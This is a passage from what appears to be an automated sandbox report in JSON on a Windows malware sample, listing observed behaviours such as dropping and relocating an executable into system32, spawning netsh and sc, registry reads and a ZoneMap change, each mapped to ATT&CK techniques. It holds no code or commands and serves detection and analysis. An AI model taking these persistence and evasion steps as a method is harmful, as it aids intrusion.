{"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"egzkrznd.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48\" was detected as \"VC8 -> Microsoft Corporation\"\n \"egzkrznd.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"egzkrznd.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\egzkrznd.exe]- [targetUID: 00000000-00004000]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"egzkrznd.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" reads file \"c:\\189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SHELLCOMPATIBILITY\\APPLICATIONS\\189A5558A4CB373F8C8035808FA7BFFC20478EFB068B02CC1F7D27BB34740E48.EXE\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe.Local\\\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\189A5558A4CB373F8C8035808FA7BFFC20478EFB068B02CC1F7D27BB34740E48.EXE.LOCAL\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\egzkrznd.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"CONSENTPROMPTBEHAVIORADMIN\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM\"; Key: \"PROMPTONSECUREDESKTOP\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"MAXIMIZEAPPS\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\"; Key: \"MAXIMIZEAPPS\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"189A5558A4CB373F8C8035808FA7BFFC20478EFB068B02CC1F7D27BB34740E48\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"egzkrznd.exe.67EE4A6E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"egzkrznd.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\egzkrznd.exe]- [targetUID: 00000000-00004000]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"egzkrznd.exe.67EE4A6E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"egzkrznd.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\egzkrznd.exe]- [targetUID: 00000000-00004000]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-162", "type": 6, "relevance": 1, "name": "Renames files", "description": "\"cmd.exe\" renamed original file\"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\egzkrznd.exe\" to \"%WINDIR%\\system32\\zvdnuoqu\\egzkrznd.exe\"", "origin": "API Call", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-9", "type": 6, "relevance": 4, "name": "Queries process information", "description": "\"netsh.exe\" queried SystemProcessInformation at 00000000-00003360-00000105-377964 [PID: 3360]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003360-00000105-666342 [PID: 3360]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003360-00000105-2223031 [PID: 3360]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003360-00000105-2457245 [PID: 3360]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003360-00000105-2894026 [PID: 3360]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003360-00000105-3100448 [PID: 3360]\n \"netsh.exe\" queried SystemProcessInformation at 00000000-00003360-00000105-3659376 [PID: 3360]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00003900-00000105-59740 [PID: 3900]\n \"svchost.exe\" queried SystemProcessInformation at 00000000-00003900-00000105-323677 [PID: 3900]", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "module-16", "type": 10, "relevance": 3, "name": "Loads the debugger/analysis tool module", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F370000\n \"egzkrznd.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F370000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F370000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00003360-00000105-5729105", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" queries volume information of \"C:\\\" at 00000000-00005872-0000010C-1312675\n \"189a5558a4cb373f8c8035808fa7bffc20478efb068b02cc1f7d27bb34740e48.exe\" queries volume information of \"C:\\\" at 00000000-00005872-0000010C-1314068\n \"egzkrznd.exe\" queries volume information of \"C:\\\" at 00000000-00001396-0000010C-1734812\n 